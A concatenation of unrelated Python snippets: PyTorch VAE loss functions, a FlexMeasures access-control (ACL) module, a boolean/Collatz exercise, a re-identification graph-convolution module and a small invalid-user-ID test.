    def forward(self, M2_mean, M2_log_sigma, disc_log_alpha):
        batch_size = M2_mean.size(0)
        # calculate latent space KL divergence
        M2_mean_sq = M2_mean * M2_mean
        M2_log_sigma_sq = 2 * M2_log_sigma
        M2_sigma_sq = torch.exp(M2_log_sigma_sq)
        M2_continuous_kl_loss = 0.5 * torch.sum(M2_mean_sq + M2_sigma_sq - M2_log_sigma_sq - 1) / batch_size
disc_kl_loss = torch.sum(torch.exp(disc_log_alpha) * (disc_log_alpha - self.disc_log_prior_param)) / batch_size return M2_continuous_kl_loss, disc_kl_loss class ClsCriterion(nn.Module): def __init__(self): super(ClsCriterion, self).__init__() def forward(self, predict, label, batch_weight=None): """ :param predict: B*C log_softmax result :param label: B*C one-hot label :param batch_weight: B*1 0-1 weight for each item in a batch :return: cross entropy loss """ if batch_weight is None: cls_loss = -1 * torch.mean(torch.sum(predict * label, dim=1)) else: cls_loss = -1 * torch.mean(torch.sum(predict * label, dim=1) * batch_weight) return cls_loss class ReconstructionCriterion(nn.Module): """ Here we calculate the criterion for -log p(x|z), we list two forms, the binary cross entropy form as well as the mse loss form """ def __init__(self, x_sigma=1, bce_reconstruction=True): super(ReconstructionCriterion, self).__init__() self.x_sigma = x_sigma self.bce_reconstruction = bce_reconstruction def forward(self, x, x_reconstructed): batch_size = x.size(0) # calculate reconstruct loss, sum in instance, mean in batch # we use the Binary Cross Entropy loss to do calculation if self.bce_reconstruction: reconstruct_loss = F.binary_cross_entropy_with_logits(x_reconstructed, x, reduction="sum") / (batch_size) else: reconstruct_loss = F.mse_loss(torch.sigmoid(x_reconstructed), x, reduction="sum") / ( 2 * batch_size * (self.x_sigma ** 2)) return reconstruct_loss class KLNormCriterion(nn.Module): def __init__(self): super(KLNormCriterion, self).__init__() def forward(self, z_mean_pre, z_log_sigma_pre, z_mean_gt=None, z_sigma_gt=None): batch_size = z_mean_pre.size(0) if z_mean_gt is None or z_sigma_gt is None: """ KL[N(z_mean_pre,z_sigma_pre)||N(0,I)] """ z_mean_sq = z_mean_pre * z_mean_pre z_log_sigma_sq = 2 * z_log_sigma_pre z_sigma_sq = torch.exp(z_log_sigma_sq) kl_loss = 0.5 * torch.sum(z_mean_sq + z_sigma_sq - z_log_sigma_sq - 1) / batch_size else: """ KL[N(z_mean_pre,z_sigma_pre)||N(z_mean_gt,z_sigma_gt)] """ z_log_sigma_sq_pre = 2 * z_log_sigma_pre z_sigma_sq_pre = torch.exp(z_log_sigma_sq_pre) z_log_sigma_sq_gt = 2 * torch.log(z_sigma_gt + 1e-4) z_sigma_sq_gt = z_sigma_gt ** 2 kl_loss = 0.5 * torch.sum(z_log_sigma_sq_gt - z_log_sigma_sq_pre + z_sigma_sq_pre / z_sigma_sq_gt + ( z_mean_pre - z_mean_gt) ** 2 / z_sigma_sq_gt - 1) / batch_size return kl_loss class KLDiscCriterion(nn.Module): """ calculate sum (j=1,...,K) D_KL[q(c_j|x)||p(c_j|x)] """ def __init__(self): super(KLDiscCriterion, self).__init__() def forward(self, disc_log_pre, disc_gt, qp_order=True): batch_size = disc_log_pre.size(0) disc_log_gt = torch.log(disc_gt + 1e-4) if qp_order: loss = torch.sum(torch.exp(disc_log_pre) * (disc_log_pre - disc_log_gt)) / batch_size else: loss = torch.sum(disc_gt * (disc_log_gt - disc_log_pre)) / batch_size return loss
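# A minimal sanity check (a sketch, not part of the original file; it uses only
# KLNormCriterion, which is CPU-safe, whereas VAECriterion and M2Criterion call
# .cuda() in __init__ and need a GPU). With mu = 0 and sigma = 1,
# KL[N(mu, sigma^2) || N(0, I)] is exactly 0.
if __name__ == "__main__":
    mu = torch.zeros(4, 8)
    log_sigma = torch.zeros(4, 8)  # log(1) = 0, i.e. unit variance
    print(KLNormCriterion()(mu, log_sigma).item())  # 0.0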
11590431
from typing import Dict, Union, Tuple, List

from flask import current_app
from flask_security import current_user
from werkzeug.exceptions import Unauthorized, Forbidden

PERMISSIONS = ["create-children", "read", "read-children", "update", "delete"]

ADMIN_ROLE = "admin"
ADMIN_READER_ROLE = "admin-reader"

# constants to allow access to certain groups
EVERY_LOGGED_IN_USER = "every-logged-in-user"

PRINCIPALS_TYPE = Union[str, Tuple[str], List[Union[str, Tuple[str]]]]


class AuthModelMixin(object):
    def __acl__(self) -> Dict[str, PRINCIPALS_TYPE]:
        """
        This function returns an access control list (ACL) for an instance of a model which is relevant for authorization.

        ACLs in FlexMeasures are inspired by Pyramid's resource ACLs.
        In an ACL, we list which principals (security contexts, see below) allow certain kinds
        of actions ― by mapping supported permissions to the required principals.

        # What is a principal / security context?

        In computer security, a "principal" is the security context of the authenticated user [1].
        For example, within FlexMeasures, an accepted principal is "user:2", which denotes that
        the user should have ID 2 (more technical specifications follow below).

        # Example

        Here are some examples of principals mapped to permissions in a fictional ACL:

        {
            "create-children": "account:3",       # Everyone in Account 3 can create child items (e.g. beliefs for a sensor)
            "read": EVERY_LOGGED_IN_USER,         # Reading is available to every logged-in user
            "update": ["user:14",                 # This user can update, ...
                       "user:15",                 # and also this user, ...
                       "account-role:MDC"],       # and so can people in accounts with the MDC role
            "delete": ("account:3", "role:CEO"),  # Only CEOs of Account 3 can delete
        }

        Such a list of principals can be checked with user_matches_principals, see below.

        # Specifications of principals

        Within FlexMeasures, a principal is handled as a string, usually defining context and
        identification, like so: <context>:<identification>.

        Supported contexts are user and account IDs, as well as user and account roles.
        All of them feature in the example above.

        Iterable principal descriptors should be treated as follows:
        - a list contains OR-connected items, which can be principals or tuples of principals
          (one of the items in the list is sufficient to grant the permission)
        - a tuple contains AND-connected strings (you need all of the items in the tuple
          to grant the permission).

        # Row-level authorization

        This ACL approach to authorization is usually called "row-level authorization" ― it
        always requires an instance, from which to get the ACL. Unlike Pyramid, we have not
        implemented table-level authorization, where a class can also provide an ACL.
        This works because we make use of the hierarchy in our model.

        The highest level (e.g. an account) is created by site-admins and usually not in the
        API, but the CLI. For everything else, we can ask the ACL on an instance, if we can
        handle it like we intend to. For creation of instances (where there is no instance to
        ask), it makes sense to use the instance one level up to look up the correct permission
        ("create-children"). E.g. to create belief data for a sensor, we can check the
        "create-children" permission on the sensor.

        [1] https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals#a-href-idw2k3tr-princ-whatawhat-are-security-principals
        """
        return {}


def check_access(context: AuthModelMixin, permission: str):
    """
    Check if the current user can access this auth context, given the required permission,
    either with admin rights or via matching principal(s).

    Raises 401 or 403 otherwise.
    """
    # check current user
    if permission not in PERMISSIONS:
        raise Forbidden(f"Permission '{permission}' cannot be handled.")
    if current_user.is_anonymous:
        raise Unauthorized()
    # check context
    if context is None:
        raise Forbidden(
            f"Context needs {permission}-permission, but no context was passed."
        )
    if not isinstance(context, AuthModelMixin):
        raise Forbidden(
            f"Context {context} needs {permission}-permission, but is no AuthModelMixin."
        )
    # look up principals
    acl = context.__acl__()
    principals: PRINCIPALS_TYPE = acl.get(permission, [])
    current_app.logger.debug(
        f"Looking for {permission}-permission on {context} ... Principals: {principals}"
    )
    # check access
    if not user_has_admin_access(
        current_user, permission
    ) and not user_matches_principals(current_user, principals):
        raise Forbidden(
            f"Authorization failure (accessing {context} to {permission}) ― cannot match {current_user} against {principals}!"
        )


def user_has_admin_access(user, permission: str) -> bool:
    if user.has_role(ADMIN_ROLE) or (
        user.has_role(ADMIN_READER_ROLE) and permission == "read"
    ):
        return True
    return False


def user_matches_principals(user, principals: PRINCIPALS_TYPE) -> bool:
    """
    Test if the user matches any of the passed principals.
    Each principal can be a tuple of requirements, all of which have to match (AND),
    while the top-level list is OR-connected. Returns False if no principals are passed.
    """
    if not isinstance(principals, list):
        principals = [principals]
    # now we handle a list of str or Tuple[str]
    for matchable_principals in principals:
        if isinstance(matchable_principals, str):
            matchable_principals = (
                matchable_principals,
            )  # now we handle only Tuple[str]
        if EVERY_LOGGED_IN_USER in matchable_principals:
            return True
        if user is not None and all(
            [
                (
                    check_user_identity(user, principal)
                    or check_user_role(user, principal)
                    or check_account_membership(user, principal)
                    or check_account_role(user, principal)
                )
                for principal in matchable_principals
            ]
        ):
            return True
    return False


def check_user_identity(user, principal: str) -> bool:
    if principal.startswith("user:"):
        user_id = principal.split("user:")[1]
        if not user_id.isdigit():
            current_app.logger.warning(
                f"Cannot match principal for user ID {user_id} ― no digit."
            )
        elif user.id == int(user_id):
            return True
    return False


def check_user_role(user, principal: str) -> bool:
    if principal.startswith("role:"):
        user_role = principal.split("role:")[1]
        if user.has_role(user_role):
            return True
    return False


def check_account_membership(user, principal: str) -> bool:
    if principal.startswith("account:"):
        account_id = principal.split("account:")[1]
        if not account_id.isdigit():
            current_app.logger.warning(
                f"Cannot match principal for account ID {account_id} ― no digit."
            )
        elif user.account.id == int(account_id):
            return True
    return False


def check_account_role(user, principal: str) -> bool:
    if principal.startswith("account-role:"):
        account_role = principal.split("account-role:")[1]
        if user.account.has_role(account_role):
            return True
    return False
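# A hypothetical model (not part of FlexMeasures itself) illustrating how an
# ACL is declared and checked; "account:3" and "role:CEO" are made-up
# principals used only for this sketch.
class ExampleAsset(AuthModelMixin):
    def __acl__(self) -> Dict[str, PRINCIPALS_TYPE]:
        return {
            "read": EVERY_LOGGED_IN_USER,
            "update": "account:3",                # anyone in account 3
            "delete": ("account:3", "role:CEO"),  # account 3 AND the CEO role
        }

# check_access(ExampleAsset(), "delete")  # Forbidden unless both parts match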
11590489
from .preprocess_dataset import PreprocessDataset from .intra_speaker_dataset import IntraSpeakerDataset, collate_batch from .utils import *
11590520
# Truth table for the expression: not (p or not q)
# (by De Morgan's laws this is equivalent to (not p) and q)

p = True
q = True
print(not (p or not q))  # False

p = True
q = False
print(not (p or not q))  # False

p = False
q = True
print(not (p or not q))  # True

p = False
q = False
print(not (p or not q))  # False


def nand(bool1, bool2):
    """
    Take two Boolean values bool1 and bool2 and return their logical NAND:
    False when both are True, True otherwise.
    """
    if bool1:
        if bool2:
            return False
        else:
            return True
    else:
        return True


def f(x):
    """One step of the Collatz (hailstone) rule: halve even x, else 3x + 1."""
    if x % 2 == 0:
        return x // 2
    else:
        return (x * 3) + 1


print(f(f(f(f(f(f(f(674))))))))                         # 7 applications: 190
print(f(f(f(f(f(f(f(f(f(f(f(f(f(f(1071)))))))))))))))  # 14 applications: 3053
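# A short verification sketch: enumerate all four assignments and confirm the
# De Morgan identity not (p or not q) == (not p) and q used above.
from itertools import product

for p, q in product([True, False], repeat=2):
    assert (not (p or not q)) == ((not p) and q)
    print(p, q, not (p or not q))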
11590524
import numpy as np
import torch
import torch.nn as nn

from .GraphConvNet import GraphConvNet


class HOReIDGraphConvNet(nn.Module):
    def __init__(self, cfg):
        super(HOReIDGraphConvNet, self).__init__()
        self.cfg = cfg
        self.device = cfg.device
        self.branch_num = cfg.keypoints_model.branch_num

        self.linked_edges = \
            [[13, 0], [13, 1], [13, 2], [13, 3], [13, 4], [13, 5], [13, 6], [13, 7], [13, 8], [13, 9],
             [13, 10], [13, 11], [13, 12],  # global
             [0, 1], [0, 2],  # head
             [1, 2], [1, 7], [2, 8], [7, 8], [1, 8], [2, 7],  # body
             [1, 3], [3, 5], [2, 4], [4, 6], [7, 9], [9, 11], [8, 10], [10, 12],  # limbs
             # [3, 4], [5, 6], [9, 10], [11, 12],  # symmetric limb links
             ]

        self.scale = cfg.model.gcn.scale

        # [[0. 1. 1. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 1.]
        #  [1. 0. 1. 1. 0. 0. 0. 1. 1. 0. 0. 0. 0. 1.]
        #  [1. 1. 0. 0. 1. 0. 0. 1. 1. 0. 0. 0. 0. 1.]
        #  [0. 1. 0. 0. 0. 1. 0. 0. 0. 0. 0. 0. 0. 1.]
        #  [0. 0. 1. 0. 0. 0. 1. 0. 0. 0. 0. 0. 0. 1.]
        #  [0. 0. 0. 1. 0. 0. 0. 0. 0. 0. 0. 0. 0. 1.]
        #  [0. 0. 0. 0. 1. 0. 0. 0. 0. 0. 0. 0. 0. 1.]
        #  [0. 1. 1. 0. 0. 0. 0. 0. 1. 1. 0. 0. 0. 1.]
        #  [0. 1. 1. 0. 0. 0. 0. 1. 0. 0. 1. 0. 0. 1.]
        #  [0. 0. 0. 0. 0. 0. 0. 1. 0. 0. 0. 1. 0. 1.]
        #  [0. 0. 0. 0. 0. 0. 0. 0. 1. 0. 0. 0. 1. 1.]
        #  [0. 0. 0. 0. 0. 0. 0. 0. 0. 1. 0. 0. 0. 1.]
        #  [0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 1. 0. 0. 1.]
        #  [0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 1.]]
        self.adj = self.generate_adj(self.branch_num, self.linked_edges, self_connect=0.0).to(self.device)
        self.gcn = GraphConvNet(adj=self.adj, in_dim=2048, hidden_dim=2048, out_dim=2048,
                                scale=self.scale).to(self.device)

    @staticmethod
    def generate_adj(node_num, linked_edges, self_connect=1):
        """
        :param node_num: node number
        :param linked_edges: [[from_where, to_where], ...]
        :param self_connect: weight put on the diagonal (0 disables self-connections)
        :return: the adjacency matrix as a float32 torch tensor
        """
        if self_connect > 0:
            adj = np.eye(node_num) * self_connect
        else:
            # adj = np.zeros([node_num, node_num])
            adj = np.zeros([node_num] * 2)

        for i, j in linked_edges:
            adj[i, j] = 1.0
            adj[j, i] = 1.0
        # print(adj)

        # we suppose the last one is the global feature node; its row
        # [1. 1. ... 1. 0.] is replaced by [0. 0. ... 0. 1.],
        # so it only connects to itself
        adj[-1, :-1] = 0
        adj[-1, -1] = 1
        # print(adj)

        adj = torch.from_numpy(adj.astype(np.float32))
        return adj

    def __call__(self, out_dict):
        out_dict['gcned_feat_vec_list'] = self.gcn(out_dict['feat_vec_list'])
        out_dict['adj'] = self.adj
        return out_dict
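# A minimal sketch of the adjacency construction on its own (no cfg or GPU
# needed; assumes the module is imported in its package context, since the
# relative import above would fail when run as a plain script). Node 13 plays
# the "global" role and is linked to all 13 keypoint nodes.
if __name__ == "__main__":
    edges = [[13, i] for i in range(13)] + [[0, 1], [0, 2]]
    adj = HOReIDGraphConvNet.generate_adj(14, edges, self_connect=0.0)
    print(adj.shape)  # torch.Size([14, 14])
    print(adj[-1])    # the global node's row keeps only its self-entry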
11590574
INVALID_USER_ID = 0 with frontend.signin("alice"): frontend.operation( "addreviewfilters", data={ "review_id": 1, "filters": [{ "type": "watcher", "user_ids": [INVALID_USER_ID], "paths": ["/"] }] }, expect={ "status": "failure", "code": "invaliduserid" })